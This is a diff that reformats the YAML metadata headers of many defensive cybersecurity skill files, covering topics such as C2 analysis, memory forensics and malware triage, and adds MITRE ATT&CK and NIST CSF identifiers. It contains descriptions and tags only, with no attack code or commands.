-description: Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate network detection signatures.
+description: Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike
  and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate
  network detection signatures.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [cobalt-strike, malleable-c2, c2-detection, beacon-analysis, network-signatures, threat-hunting, red-team-tools]
+tags:
-version: "1.0"
+- cobalt-strike
 - malleable-c2
 - c2-detection
 - beacon-analysis
 - network-signatures
 - threat-hunting
 - red-team-tools
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573.002
 - T1001.003
 - T1090.004
 - T1102
 ---
 # Analyzing CobaltStrike Malleable C2 Profiles
@@ -1,17 +1,34 @@
 ---
 name: analyzing-command-and-control-communication
-description: >
+description: 'Analyzes malware command-and-control (C2) communication protocols to
-  Analyzes malware command-and-control (C2) communication protocols to understand beacon
+  understand beacon patterns, command structures, data encoding, and infrastructure.
-  patterns, command structures, data encoding, and infrastructure. Covers HTTP, HTTPS, DNS,
+  Covers HTTP, HTTPS, DNS, and custom protocol C2 analysis for detection development
-  and custom protocol C2 analysis for detection development and threat intelligence.
+  and threat intelligence. Activates for requests involving C2 analysis, beacon detection,
-  Activates for requests involving C2 analysis, beacon detection, C2 protocol reverse
+  C2 protocol reverse engineering, or command-and-control infrastructure mapping.
-  engineering, or command-and-control infrastructure mapping.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, C2, command-and-control, beacon, protocol-analysis]
+tags:
 - malware
 - C2
 - command-and-control
 - beacon
 - protocol-analysis
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573
 - T1571
 - T1008
 - T1095
 ---
 # Analyzing Command-and-Control Communication
@@ -1,18 +1,37 @@
 ---
 name: analyzing-cyber-kill-chain
-description: >
+description: 'Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain
-  Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain framework to identify
+  framework to identify which phases an adversary has completed, where defenses succeeded
-  which phases an adversary has completed, where defenses succeeded or failed, and what controls
+  or failed, and what controls would have interrupted the attack at earlier phases.
-  would have interrupted the attack at earlier phases. Use when conducting post-incident analysis,
+  Use when conducting post-incident analysis, building prevention-focused security
-  building prevention-focused security controls, or mapping detection gaps to kill chain phases.
+  controls, or mapping detection gaps to kill chain phases. Activates for requests
-  Activates for requests involving kill chain analysis, intrusion kill chain, attack phase mapping,
+  involving kill chain analysis, intrusion kill chain, attack phase mapping, or Lockheed
-  or Lockheed Martin kill chain framework.
+  Martin kill chain framework.
  '
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [kill-chain, Lockheed-Martin, MITRE-ATT&CK, intrusion-analysis, defense-in-depth, NIST-CSF]
+tags:
 - kill-chain
 - Lockheed-Martin
 - MITRE-ATT&CK
 - intrusion-analysis
 - defense-in-depth
 - NIST-CSF
 version: 1.0.0
 author: team-cybersecurity
 license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1566.001
 - T1190
 - T1547.001
 - T1071.001
 - T1486
 ---
 # Analyzing Cyber Kill Chain
@@ -1,12 +1,29 @@
 ---
 name: analyzing-disk-image-with-autopsy
-description: Perform comprehensive forensic analysis of disk images using Autopsy to recover files, examine artifacts, and build investigation timelines.
+description: Perform comprehensive forensic analysis of disk images using Autopsy
  to recover files, examine artifacts, and build investigation timelines.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, autopsy, disk-analysis, sleuth-kit, file-recovery, artifact-analysis]
+tags:
-version: "1.0"
+- forensics
 - autopsy
 - disk-analysis
 - sleuth-kit
 - file-recovery
 - artifact-analysis
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1005
 - T1074.001
 - T1070.004
 - T1083
 ---
 # Analyzing Disk Image with Autopsy
@@ -1,16 +1,38 @@
 ---
 name: analyzing-dns-logs-for-exfiltration
-description: >
+description: 'Analyzes DNS query logs to detect data exfiltration via DNS tunneling,
-  Analyzes DNS query logs to detect data exfiltration via DNS tunneling, DGA domain communication,
+  DGA domain communication, and covert C2 channels using entropy analysis, query volume
-  and covert C2 channels using entropy analysis, query volume anomalies, and subdomain length
+  anomalies, and subdomain length detection in SIEM platforms. Use when SOC teams
-  detection in SIEM platforms. Use when SOC teams need to identify DNS-based threats that bypass
+  need to identify DNS-based threats that bypass traditional network security controls.
-  traditional network security controls.
+
  '
 domain: cybersecurity
 subdomain: soc-operations
-tags: [soc, dns, exfiltration, dns-tunneling, dga, c2-detection, splunk, threat-detection]
+tags:
-version: "1.0"
+- soc
 - dns
 - exfiltration
 - dns-tunneling
 - dga
 - c2-detection
 - splunk
 - threat-detection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0024
 - AML.T0056
 - AML.T0086
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - RS.MA-01
 - DE.AE-06
 mitre_attack:
 - T1048.003
 - T1071.004
 - T1567
 ---
 # Analyzing DNS Logs for Exfiltration
@@ -1,12 +1,29 @@
 ---
 name: analyzing-docker-container-forensics
-description: Investigate compromised Docker containers by analyzing images, layers, volumes, logs, and runtime artifacts to identify malicious activity and evidence.
+description: Investigate compromised Docker containers by analyzing images, layers,
  volumes, logs, and runtime artifacts to identify malicious activity and evidence.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, docker, container-forensics, container-security, image-analysis, runtime-investigation]
+tags:
-version: "1.0"
+- forensics
 - docker
 - container-forensics
 - container-security
 - image-analysis
 - runtime-investigation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1610
 - T1611
 - T1613
 - T1612
 ---
 # Analyzing Docker Container Forensics
@@ -1,12 +1,63 @@
 ---
 name: analyzing-email-headers-for-phishing-investigation
-description: Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
+description: Parse and analyze email headers to trace the origin of phishing emails,
  verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, email-analysis, phishing, spf, dkim, dmarc, header-analysis]
+tags:
-version: "1.0"
+- forensics
 - email-analysis
 - phishing
 - spf
 - dkim
 - dmarc
 - header-analysis
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1566.001
 - T1566.002
 - T1598.003
 mitre_f3:
  version: '1.1'
  tactics:
  - reconnaissance
  - initial-access
  - stealth
  - resource-development
  techniques:
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
  - id: T1672
    name: Email Spoofing
    tactic: stealth
    source: attack
  - id: F1032
    name: Impersonate Official
    tactic: initial-access
    source: f3
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
 ---
 # Analyzing Email Headers for Phishing Investigation
@@ -1,12 +1,29 @@
 ---
 name: analyzing-ethereum-smart-contract-vulnerabilities
-description: Perform static and symbolic analysis of Solidity smart contracts using Slither and Mythril to detect reentrancy, integer overflow, access control, and other vulnerability classes before deployment to Ethereum mainnet.
+description: Perform static and symbolic analysis of Solidity smart contracts using
  Slither and Mythril to detect reentrancy, integer overflow, access control, and
  other vulnerability classes before deployment to Ethereum mainnet.
 domain: cybersecurity
 subdomain: blockchain-security
-tags: [ethereum, solidity, smart-contract, slither, mythril, blockchain, defi, audit]
+tags:
-version: "1.0"
+- ethereum
 - solidity
 - smart-contract
 - slither
 - mythril
 - blockchain
 - defi
 - audit
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.DS-01
 - PR.DS-02
 - ID.RA-01
 mitre_attack:
 - T1190
 - T1059
 ---
 # Analyzing Ethereum Smart Contract Vulnerabilities
@@ -1,12 +1,31 @@
 ---
 name: analyzing-golang-malware-with-ghidra
-description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction, and type reconstruction in stripped Go binaries.
+description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts
  for function recovery, string extraction, and type reconstruction in stripped Go
  binaries.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [golang, ghidra, reverse-engineering, malware-analysis, binary-analysis, go-malware, disassembly]
+tags:
-version: "1.0"
+- golang
 - ghidra
 - reverse-engineering
 - malware-analysis
 - binary-analysis
 - go-malware
 - disassembly
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1027
 - T1620
 - T1140
 - T1059
 ---
 # Analyzing Golang Malware with Ghidra
@@ -1,12 +1,28 @@
 ---
 name: analyzing-heap-spray-exploitation
-description: Detect and analyze heap spray attacks in memory dumps using Volatility3 plugins to identify NOP sled patterns, shellcode landing zones, and suspicious large allocations in process virtual address space.
+description: Detect and analyze heap spray attacks in memory dumps using Volatility3
  plugins to identify NOP sled patterns, shellcode landing zones, and suspicious large
  allocations in process virtual address space.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware-analysis, memory-forensics, heap-spray, volatility3, exploit-analysis]
+tags:
-version: "1.0"
+- malware-analysis
 - memory-forensics
 - heap-spray
 - volatility3
 - exploit-analysis
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1203
 - T1059.007
 - T1106
 ---
 # Analyzing Heap Spray Exploitation
@@ -1,17 +1,62 @@
 ---
 name: analyzing-indicators-of-compromise
-description: >
+description: 'Analyzes indicators of compromise (IOCs) including IP addresses, domains,
-  Analyzes indicators of compromise (IOCs) including IP addresses, domains, file hashes, URLs,
+  file hashes, URLs, and email artifacts to determine maliciousness confidence, campaign
-  and email artifacts to determine maliciousness confidence, campaign attribution, and blocking
+  attribution, and blocking priority. Use when triaging IOCs from phishing emails,
-  priority. Use when triaging IOCs from phishing emails, security alerts, or external threat feeds;
+  security alerts, or external threat feeds; enriching raw IOCs with multi-source
-  enriching raw IOCs with multi-source intelligence; or making block/monitor/whitelist decisions.
+  intelligence; or making block/monitor/whitelist decisions. Activates for requests
-  Activates for requests involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
+  involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
  '
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [IOC, VirusTotal, AbuseIPDB, MalwareBazaar, MISP, threat-intelligence, STIX, NIST-CSF]
+tags:
 - IOC
 - VirusTotal
 - AbuseIPDB
 - MalwareBazaar
 - MISP
 - threat-intelligence
 - STIX
 - NIST-CSF
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1071
 - T1105
 - T1041
 - T1567
 mitre_f3:
  version: '1.1'
  tactics:
  - reconnaissance
  - resource-development
  - initial-access
  techniques:
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
 ---
 # Analyzing Indicators of Compromise
@@ -1,18 +1,38 @@
 ---
 name: analyzing-ios-app-security-with-objection
-description: >
+description: >-
-  Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered
+  Runtime iOS app security testing with Objection (Frida): inspect keychain and
-  toolkit that enables security testers to interact with app internals without jailbreaking. Use when
+  filesystem data, explore app internals at runtime, and validate/bypass
-  assessing iOS app security posture, bypassing client-side protections, dumping keychain items,
+  client-side protections during authorized mobile assessments.
  inspecting filesystem storage, and evaluating runtime behavior. Activates for requests involving
  iOS security testing, Objection runtime analysis, Frida-based iOS assessment, or mobile runtime
  exploration.
 domain: cybersecurity
 subdomain: mobile-security
 author: mahipal
-tags: [mobile-security, ios, objection, frida, owasp-mobile, penetration-testing]
+tags:
 - mobile-security
 - ios
 - objection
 - frida
 - owasp-mobile
 - penetration-testing
 version: 1.0.0
 license: Apache-2.0
 atlas_techniques:
 - AML.T0054
 nist_ai_rmf:
 - MEASURE-2.7
 - MANAGE-2.4
 - GOVERN-6.2
 - MAP-5.1
 nist_csf:
 - PR.PS-01
 - PR.AA-05
 - ID.RA-01
 - DE.CM-09
 mitre_attack:
 - T1635
 - T1414
 - T1417.001
 - T1409
 ---
 # Analyzing iOS App Security with Objection
@@ -1,16 +1,34 @@
 ---
 name: analyzing-kubernetes-audit-logs
-description: >
+description: 'Parses Kubernetes API server audit logs (JSON lines) to detect exec-into-pod,
-  Parses Kubernetes API server audit logs (JSON lines) to detect exec-into-pod, secret
+  secret access, RBAC modifications, privileged pod creation, and anonymous API access.
-  access, RBAC modifications, privileged pod creation, and anonymous API access. Builds
+  Builds threat detection rules from audit event patterns. Use when investigating
-  threat detection rules from audit event patterns. Use when investigating Kubernetes
+  Kubernetes cluster compromise or building k8s-specific SIEM detection rules.
-  cluster compromise or building k8s-specific SIEM detection rules.
+
  '
 domain: cybersecurity
 subdomain: container-security
-tags: [analyzing, kubernetes, audit, logs]
+tags:
-version: "1.0"
+- kubernetes-security
 - container-security
 - audit-log-analysis
 - rbac
 - privilege-escalation
 - k8s-api-server
 - threat-detection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.PS-01
 - PR.IR-01
 - ID.AM-08
 - DE.CM-01
 mitre_attack:
 - T1610
 - T1613
 - T1078
 - T1552.007
 ---
 # Analyzing Kubernetes Audit Logs
@@ -1,18 +1,36 @@
 ---
 name: analyzing-linux-audit-logs-for-intrusion
-description: >
+description: 'Uses the Linux Audit framework (auditd) with ausearch and aureport utilities
-  Uses the Linux Audit framework (auditd) with ausearch and aureport utilities
+  to detect intrusion attempts, unauthorized access, privilege escalation, and suspicious
-  to detect intrusion attempts, unauthorized access, privilege escalation, and
+  system activity. Covers audit rule configuration, log querying, timeline reconstruction,
-  suspicious system activity. Covers audit rule configuration, log querying,
+  and integration with SIEM platforms. Activates for requests involving auditd analysis,
-  timeline reconstruction, and integration with SIEM platforms. Activates for
+  Linux audit log investigation, ausearch queries, aureport summaries, or host-based
-  requests involving auditd analysis, Linux audit log investigation, ausearch
+  intrusion detection on Linux.
-  queries, aureport summaries, or host-based intrusion detection on Linux.
+
  '
 domain: cybersecurity
 subdomain: incident-response
-tags: [auditd, ausearch, aureport, linux-security, intrusion-detection, HIDS, forensics]
+tags:
 - auditd
 - ausearch
 - aureport
 - linux-security
 - intrusion-detection
 - HIDS
 - forensics
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.MA-01
 - RS.MA-02
 - RS.AN-03
 - RC.RP-01
 mitre_attack:
 - T1059.004
 - T1070
 - T1548.003
 - T1543.002
 ---
 # Analyzing Linux Audit Logs for Intrusion
@@ -1,17 +1,57 @@
 ---
 name: analyzing-linux-elf-malware
-description: >
+description: 'Analyzes malicious Linux ELF (Executable and Linkable Format) binaries
-  Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets,
+  including botnets, cryptominers, ransomware, and rootkits targeting Linux servers,
-  cryptominers, ransomware, and rootkits targeting Linux servers, containers, and cloud
+  containers, and cloud infrastructure. Covers static analysis, dynamic tracing, and
-  infrastructure. Covers static analysis, dynamic tracing, and reverse engineering of
+  reverse engineering of x86_64 and ARM ELF samples. Activates for requests involving
-  x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis,
+  Linux malware analysis, ELF binary investigation, Linux server compromise assessment,
-  ELF binary investigation, Linux server compromise assessment, or container malware analysis.
+  or container malware analysis.
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, Linux, ELF, reverse-engineering, server-malware]
+tags:
 - malware
 - Linux
 - ELF
 - reverse-engineering
 - server-malware
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1027
 - T1059.004
 - T1620
 - T1574.006
 mitre_f3:
  version: '1.1'
  tactics:
  - positioning
  - monetization
  - reconnaissance
  techniques:
  - id: T1219
    name: Remote Access Tools
    tactic: positioning
    source: attack
  - id: T1555
    name: Credentials from Password Stores
    tactic: reconnaissance
    source: attack
  - id: F1018
    name: Convert to Cryptocurrency
    tactic: monetization
    source: f3
  - id: F1047
    name: Transfer of funds
    tactic: monetization
    source: f3
 ---
 # Analyzing Linux ELF Malware
@@ -1,12 +1,32 @@
 ---
 name: analyzing-linux-kernel-rootkits
-description: Detect kernel-level rootkits in Linux memory dumps using Volatility3 linux plugins (check_syscall, lsmod, hidden_modules), rkhunter system scanning, and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel modules, and tampered system structures.
+description: Detect kernel-level rootkits in Linux memory dumps using Volatility3
  linux plugins (check_syscall, lsmod, hidden_modules), rkhunter system scanning,
  and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel
  modules, and tampered system structures.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [rootkit, linux, kernel, volatility3, memory-forensics, malware-analysis, rkhunter, forensics]
+tags:
-version: "1.0"
+- rootkit
 - linux
 - kernel
 - volatility3
 - memory-forensics
 - malware-analysis
 - rkhunter
 - forensics
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1014
 - T1547.006
 - T1564.001
 ---
 # Analyzing Linux Kernel Rootkits
@@ -1,12 +1,30 @@
 ---
 name: analyzing-linux-system-artifacts
-description: Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover evidence of compromise or unauthorized activity.
+description: Examine Linux system artifacts including auth logs, cron jobs, shell
  history, and system configuration to uncover evidence of compromise or unauthorized
  activity.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, linux-forensics, system-artifacts, log-analysis, persistence-detection, incident-investigation]
+tags:
-version: "1.0"
+- forensics
 - linux-forensics
 - system-artifacts
 - log-analysis
 - persistence-detection
 - incident-investigation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1070
 - T1059.004
 - T1543.002
 - T1053.003
 ---
 # Analyzing Linux System Artifacts
@@ -1,12 +1,33 @@
 ---
 name: analyzing-lnk-file-and-jump-list-artifacts
-description: Analyze Windows LNK shortcut files and Jump List artifacts to establish evidence of file access, program execution, and user activity using LECmd, JLECmd, and manual binary parsing of the Shell Link Binary format.
+description: Analyze Windows LNK shortcut files and Jump List artifacts to establish
  evidence of file access, program execution, and user activity using LECmd, JLECmd,
  and manual binary parsing of the Shell Link Binary format.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [lnk-files, jump-lists, lecmd, jlecmd, windows-forensics, shell-link, user-activity, file-access, program-execution, recent-files]
+tags:
-version: "1.0"
+- lnk-files
 - jump-lists
 - lecmd
 - jlecmd
 - windows-forensics
 - shell-link
 - user-activity
 - file-access
 - program-execution
 - recent-files
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1547.009
 - T1204.002
 - T1059.001
 ---
 # Analyzing LNK File and Jump List Artifacts
@@ -1,17 +1,42 @@
 ---
 name: analyzing-macro-malware-in-office-documents
-description: >
+description: 'Analyzes malicious VBA macros embedded in Microsoft Office documents
-  Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint)
+  (Word, Excel, PowerPoint) to identify download cradles, payload execution, persistence
-  to identify download cradles, payload execution, persistence mechanisms, and anti-analysis
+  mechanisms, and anti-analysis techniques. Uses olevba, oledump, and VBA deobfuscation
-  techniques. Uses olevba, oledump, and VBA deobfuscation to extract the attack chain.
+  to extract the attack chain. Activates for requests involving Office macro analysis,
-  Activates for requests involving Office macro analysis, VBA malware investigation,
+  VBA malware investigation, maldoc analysis, or document-based threat examination.
-  maldoc analysis, or document-based threat examination.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, macro, Office, VBA, document-malware]
+tags:
 - malware
 - macro
 - Office
 - VBA
 - document-malware
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0068
 - AML.T0067
 d3fend_techniques:
 - File Metadata Consistency Validation
 - Application Protocol Command Analysis
 - Identifier Analysis
 - Content Format Conversion
 - Message Analysis
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1137.001
 - T1204.002
 - T1059.005
 - T1027
 ---
 # Analyzing Macro Malware in Office Documents
@@ -1,12 +1,31 @@
 ---
 name: analyzing-malicious-pdf-with-peepdf
-description: Perform static analysis of malicious PDF documents using peepdf, pdfid, and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects.
+description: Perform static analysis of malicious PDF documents using peepdf, pdfid,
  and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware-analysis, pdf, peepdf, pdfid, pdf-parser, static-analysis, reverse-engineering, dfir]
+tags:
-version: "1.0"
+- malware-analysis
 - pdf
 - peepdf
 - pdfid
 - pdf-parser
 - static-analysis
 - reverse-engineering
 - dfir
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1204.002
 - T1059.007
 - T1027
 - T1106
 ---
 # Analyzing Malicious PDF with peepdf
@@ -1,12 +1,32 @@
 ---
 name: analyzing-malicious-url-with-urlscan
-description: URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
+description: URLScan.io is a free service for scanning and analyzing suspicious URLs.
  It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and
  network connections of web pages in an isolat
 domain: cybersecurity
 subdomain: phishing-defense
-tags: [phishing, email-security, social-engineering, dmarc, awareness, url-analysis, threat-intelligence]
+tags:
-version: "1.0"
+- phishing
 - email-security
 - social-engineering
 - dmarc
 - awareness
 - url-analysis
 - threat-intelligence
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0052
 nist_csf:
 - PR.AT-01
 - DE.CM-09
 - RS.CO-02
 - DE.AE-02
 mitre_attack:
 - T1566.002
 - T1204.001
 - T1598.003
 ---
 # Analyzing Malicious URL with URLScan
@@ -1,17 +1,33 @@
 ---
 name: analyzing-malware-behavior-with-cuckoo-sandbox
-description: >
+description: 'Executes malware samples in Cuckoo Sandbox to observe runtime behavior
-  Executes malware samples in Cuckoo Sandbox to observe runtime behavior including
+  including process creation, file system modifications, registry changes, network
-  process creation, file system modifications, registry changes, network communications,
+  communications, and API calls. Generates comprehensive behavioral reports for malware
-  and API calls. Generates comprehensive behavioral reports for malware classification
+  classification and IOC extraction. Activates for requests involving dynamic malware
-  and IOC extraction. Activates for requests involving dynamic malware analysis, sandbox
+  analysis, sandbox detonation, behavioral analysis, or automated malware execution.
-  detonation, behavioral analysis, or automated malware execution.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, dynamic-analysis, sandbox, Cuckoo, behavioral-analysis]
+tags:
 - malware
 - dynamic-analysis
 - sandbox
 - Cuckoo
 - behavioral-analysis
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1497
 - T1055
 - T1071
 - T1027
 ---
 # Analyzing Malware Behavior with Cuckoo Sandbox
@@ -1,12 +1,31 @@
 ---
 name: analyzing-malware-family-relationships-with-malpedia
-description: Use the Malpedia platform and API to research malware family relationships, track variant evolution, link families to threat actors, and integrate YARA rules for detection across malware lineages.
+description: Use the Malpedia platform and API to research malware family relationships,
  track variant evolution, link families to threat actors, and integrate YARA rules
  for detection across malware lineages.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [malpedia, malware-family, yara, threat-actor, malware-tracking, threat-intelligence, variant-analysis, malware-intelligence]
+tags:
-version: "1.0"
+- malpedia
 - malware-family
 - yara
 - threat-actor
 - malware-tracking
 - threat-intelligence
 - variant-analysis
 - malware-intelligence
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1587.001
 - T1027
 - T1071
 ---
 # Analyzing Malware Family Relationships with Malpedia
@@ -1,12 +1,39 @@
 ---
 name: analyzing-malware-persistence-with-autoruns
-description: Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry keys, scheduled tasks, services, drivers, and startup locations on Windows systems.
+description: Use Sysinternals Autoruns to systematically identify and analyze malware
  persistence mechanisms across registry keys, scheduled tasks, services, drivers,
  and startup locations on Windows systems.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [autoruns, persistence, malware-analysis, sysinternals, windows, registry, startup, incident-response]
+tags:
-version: "1.0"
+- autoruns
 - persistence
 - malware-analysis
 - sysinternals
 - windows
 - registry
 - startup
 - incident-response
 mitre_attack:
 - T1547.001
 - T1543.003
 - T1053.005
 - T1574.001
 - T1037.001
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 ---
 # Analyzing Malware Persistence with Autoruns
@@ -1,19 +1,37 @@
 ---
 name: analyzing-malware-sandbox-evasion-techniques
-description: Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction detection, and sleep inflation patterns from Cuckoo/AnyRun behavioral reports
+description: Detect sandbox evasion techniques in malware samples by analyzing timing
  checks, VM artifact queries, user interaction detection, and sleep inflation patterns
  from Cuckoo/AnyRun behavioral reports
 domain: cybersecurity
 subdomain: malware-analysis
 tags:
-  - sandbox-evasion
+- sandbox-evasion
-  - malware-analysis
+- malware-analysis
-  - cuckoo
+- cuckoo
-  - anyrun
+- anyrun
-  - mitre-attack
+- mitre-attack
-  - virtualization-detection
+- virtualization-detection
-  - behavioral-analysis
+- behavioral-analysis
-version: "1.0"
+version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Platform Hardening
 - Restore Object
 - Process Analysis
 - System Call Filtering
 - Restore Software
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1497.001
 - T1497.003
 - T1480
 - T1027.002
 ---
 # Analyzing Malware Sandbox Evasion Techniques
@@ -1,17 +1,32 @@
 ---
 name: analyzing-memory-dumps-with-volatility
-description: >
+description: 'Analyzes RAM memory dumps from compromised systems using the Volatility framework to identify malicious processes,
-  Analyzes RAM memory dumps from compromised systems using the Volatility framework to
+  injected code, network connections, loaded modules, and extracted credentials. Supports Windows, Linux, and macOS memory
-  identify malicious processes, injected code, network connections, loaded modules, and
+  forensics. Activates for requests involving memory forensics, RAM analysis, volatile data examination, process injection
-  extracted credentials. Supports Windows, Linux, and macOS memory forensics. Activates
+  detection, or memory-resident malware investigation.
-  for requests involving memory forensics, RAM analysis, volatile data examination,
+
-  process injection detection, or memory-resident malware investigation.
+  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, memory-forensics, Volatility, RAM-analysis, incident-response]
+tags:
 - malware
 - memory-forensics
 - Volatility
 - RAM-analysis
 - incident-response
 mitre_attack:
 - T1055
 - T1003
 - T1059
 - T1620
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 ---
 # Analyzing Memory Dumps with Volatility
@@ -1,16 +1,34 @@
 ---
 name: analyzing-memory-forensics-with-lime-and-volatility
-description: >
+description: 'Performs Linux memory acquisition using LiME (Linux Memory Extractor)
-  Performs Linux memory acquisition using LiME (Linux Memory Extractor) kernel module
+  kernel module and analysis with Volatility 3 framework. Extracts process lists,
-  and analysis with Volatility 3 framework. Extracts process lists, network connections,
+  network connections, bash history, loaded kernel modules, and injected code from
-  bash history, loaded kernel modules, and injected code from Linux memory images.
+  Linux memory images. Use when performing incident response on compromised Linux
-  Use when performing incident response on compromised Linux systems.
+  systems.
  '
